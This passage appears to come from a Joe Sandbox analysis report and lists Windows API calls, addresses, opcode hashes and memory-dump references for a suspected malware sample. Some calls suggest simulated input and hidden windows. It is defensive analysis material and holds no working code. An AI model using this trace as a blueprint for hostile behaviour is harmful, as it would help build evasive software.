                                                                                                                                                                                                                                                      • Opcode ID: f97cf52c2f8d1641e3b8e33af5b2665e0ed0ad924b576fe30c8323033b759fb3
                                                                                                                                                                                                                                                      • Instruction ID: ad5f7423dbc30fbe1531db5d01a90acf2b714d9077bcf54b353d88c642b336d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f97cf52c2f8d1641e3b8e33af5b2665e0ed0ad924b576fe30c8323033b759fb3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C221A472900208BFDF01AFB9DC46E9E7FADDF44318F15401AF80497251EA79A9508B68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,02160CA8,00000000,00000000), ref: 0042525E
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,0042C1B8,00000000,?,00000000,02160CA8,00000000,00000000), ref: 0042532B
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000), ref: 00425332
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                                                                                                                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                                                                      • API String ID: 3784150691-4022980321
                                                                                                                                                                                                                                                      • Opcode ID: c6ab408b8c6cb5835f5466a6022ba0e563ec3acdffe6b7fdbd818136dba7c5f2
                                                                                                                                                                                                                                                      • Instruction ID: 5b7ad73316f436f963902cd660e5f4e64d758ec9cda9fa0a72d0aeb273aeb6c2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6ab408b8c6cb5835f5466a6022ba0e563ec3acdffe6b7fdbd818136dba7c5f2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD31F732700124BBD720AB75FC86FAE7769EB44314F90092BF911D2182DE7C9955876D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004284CB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                                                                                      • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                                                                                                                                                                      • API String ID: 514040917-1673886896
                                                                                                                                                                                                                                                      • Opcode ID: 0131ba96e8c4da1cc574e64602ec694c664483fbafeba3d164c4a49e8ddfde52
                                                                                                                                                                                                                                                      • Instruction ID: 55ad5e87c20d73374b45942f935eeb682e81a4f858f4906db70f1d5b0a44565b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0131ba96e8c4da1cc574e64602ec694c664483fbafeba3d164c4a49e8ddfde52
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2731D832B012347BD720BB61BD82F9E37699F04314F90455FF514A6282DEBCDA518B9E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00415114
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(-00000005), ref: 00415209
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(-00000005), ref: 00415211
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,-00000005), ref: 00415220
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00415250
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00415261
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy
                                                                                                                                                                                                                                                      • String ID: http://$ttp:
                                                                                                                                                                                                                                                      • API String ID: 805584807-2779018299
                                                                                                                                                                                                                                                      • Opcode ID: 6c7806ccabbd8fcc7ee7238832fd813b5b7c4b1b92c6720e6b48b731c2fd7ef9
                                                                                                                                                                                                                                                      • Instruction ID: bda494b76298140d12da1d84aad608d97d7fbce1a881ed08e858e6e482b803ec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c7806ccabbd8fcc7ee7238832fd813b5b7c4b1b92c6720e6b48b731c2fd7ef9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5941C631E04A55FFEB328A64CC487EFBBB1AB91314F1444A7C98592242C37C4AC6CB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(76AF0A60,00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 0042584C
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 00425860
                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(76AF0A60,00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 00425882
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,76AF0A60,00000000,?,?,?,?,00422CAF), ref: 004258B6
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 004258D8
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 004258F1
                                                                                                                                                                                                                                                      • GetEnvironmentStrings.KERNEL32(76AF0A60,00000000,?,?,?,?,00422CAF,?,0042B7F8,00000060), ref: 00425907
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00425943
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 883850110-0
                                                                                                                                                                                                                                                      • Opcode ID: 14d9f0102edccd77b9f672c77a2969e39bce88967141998df9fc879381f07455
                                                                                                                                                                                                                                                      • Instruction ID: ba898672c03263d1d32ad627b9c1e0deaafb00e3c435e1c8e460b17607d3aaf7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14d9f0102edccd77b9f672c77a2969e39bce88967141998df9fc879381f07455
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C33116B2704535AFDB207F65BC8483BBA8CEB453A47D5093BF541C3310E6B98C9186AE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000002), ref: 00405FD8
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00405FEB
                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00405FFD
                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 00406004
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00406010
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0040601B
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000001,00000001,00000080), ref: 00406034
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040603B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$DestroyEnableEnabledMessagePostProcessShowSleepThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1728564233-0
                                                                                                                                                                                                                                                      • Opcode ID: 47c4687bb97f38a7d82e6fed2abff5cd8377e49c14785139af8aabca3f8013d2
                                                                                                                                                                                                                                                      • Instruction ID: 5ce9f396147177345ac3bda0077170ccccec577589b9f7b93905b01a4a4ba7ac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47c4687bb97f38a7d82e6fed2abff5cd8377e49c14785139af8aabca3f8013d2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0012C31241114FBDB319B519D4DEAF3B7DEF86B11F4000A9FA02A6290CB795662CB7A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,?,0042C288,00000038,00425D73,?,00000000,00000000,00424DA1,00000000,00000000,0042C268,0000001C,00424AE9,00000001,00000020), ref: 004272A8
                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000001), ref: 004272BB
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00424DA1,?,00000000,00000000), ref: 00427300
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Info$ByteCharMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1166650589-0
                                                                                                                                                                                                                                                      • Opcode ID: 00acec5db0e4a054e069fe0062ea75001bc7d0bc223f1826f41e5176a31a730b
                                                                                                                                                                                                                                                      • Instruction ID: e5ae8cbd430e5c722cef079d93db996f8ae37a74317ef711a0273d561358eaeb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00acec5db0e4a054e069fe0062ea75001bc7d0bc223f1826f41e5176a31a730b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15519F31A04228EBCF30DF95FC8499F7FB9EF85754FA0412AF814A2260D7754951CB68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindow.USER32(?,00000000), ref: 00417139
                                                                                                                                                                                                                                                      • GetWindowPlacement.USER32(00000000,?,?,?,?), ref: 00417156
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(00000000,00000000,00000080), ref: 00417180
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 004171C7
                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 004171D2
                                                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000005), ref: 004171F8
                                                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00417226
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ClassEnabledNamePlacementVisible
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3556649163-0
                                                                                                                                                                                                                                                      • Opcode ID: 2808164bc23d912c63ee89b1a1680f60219bdc0d70aff655dd1ccb3fe22a3fe0
                                                                                                                                                                                                                                                      • Instruction ID: 486ed90c8f66970c450267cf30335206086b95c5f660d8f04184e3ceb6a86e1f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2808164bc23d912c63ee89b1a1680f60219bdc0d70aff655dd1ccb3fe22a3fe0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4319C71A0060AEFCF10CF68DC84AEE7BB9FF48304F0044A9F905A6252D775DA42CBA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00416BE9,00000003,?,?,76AF0440,?,0042A4DC,75D36610), ref: 00416205
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,76AF0440,?,0042A4DC,75D36610), ref: 0041620C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000003,?,?,?,?,?,76AF0440,?,0042A4DC,75D36610), ref: 00416235
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000003,?,?,?,?,?,76AF0440,?,0042A4DC,75D36610), ref: 00416246
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,76AF0440,?,0042A4DC), ref: 0041627C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,76AF0440,?,0042A4DC), ref: 004162A0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy
                                                                                                                                                                                                                                                      • String ID: ://
                                                                                                                                                                                                                                                      • API String ID: 805584807-1869659232
                                                                                                                                                                                                                                                      • Opcode ID: 2b6620673db51c54961dedac987d81946296dde7935255b6a5fe39ac733775ea
                                                                                                                                                                                                                                                      • Instruction ID: 602d06b892901c54e1810f3825f9a40bc8debde024da92d5a4960577e2ac1f88
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b6620673db51c54961dedac987d81946296dde7935255b6a5fe39ac733775ea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE31EF72500218AFCB11AFA8EC85CDB3FACEF153A4B154166FC0897251D638D965CBBA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0041507B
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 004150A1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004150A5
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 004150D3
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 004150FD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InputSend$Sleep
                                                                                                                                                                                                                                                      • String ID: V
                                                                                                                                                                                                                                                      • API String ID: 240672775-1342839628
                                                                                                                                                                                                                                                      • Opcode ID: 7b81f98a793ce5abd1e9060f4b5e1a42909660d45532c886f336ca13e155e941
                                                                                                                                                                                                                                                      • Instruction ID: 9f290cfd91dfee7e366b78b15d6756e3afb169dd54bad8c08db7a4cfee71d3d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b81f98a793ce5abd1e9060f4b5e1a42909660d45532c886f336ca13e155e941
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79212FA2D4021CBBDB11ABD6EC8AEDFFFBCEF50314F100427F601B2160E264565987A6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041C067
                                                                                                                                                                                                                                                        • Part of subcall function 004172D4: PostMessageA.USER32(004153D7,00000200,004153D7,?), ref: 004172FA
                                                                                                                                                                                                                                                        • Part of subcall function 004172D4: PostMessageA.USER32(004153D7,00000021,004153D7,02040001), ref: 00417305
                                                                                                                                                                                                                                                        • Part of subcall function 004172D4: PostMessageA.USER32(004153D7,00000201,00000001,?), ref: 00417310
                                                                                                                                                                                                                                                        • Part of subcall function 004172D4: PostMessageA.USER32(004153D7,00000202,00000001,?), ref: 0041731B
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0041C09F
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0041C0A5
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(?,?), ref: 0041C0B7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0041C0BB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0041C0C4
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(?,?), ref: 0041C0CC
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetDesktopWindow.USER32 ref: 0041436A
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(00000000), ref: 00414377
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(?,?), ref: 00414381
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowTextA.USER32(?,0042A440), ref: 0041438F
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414401
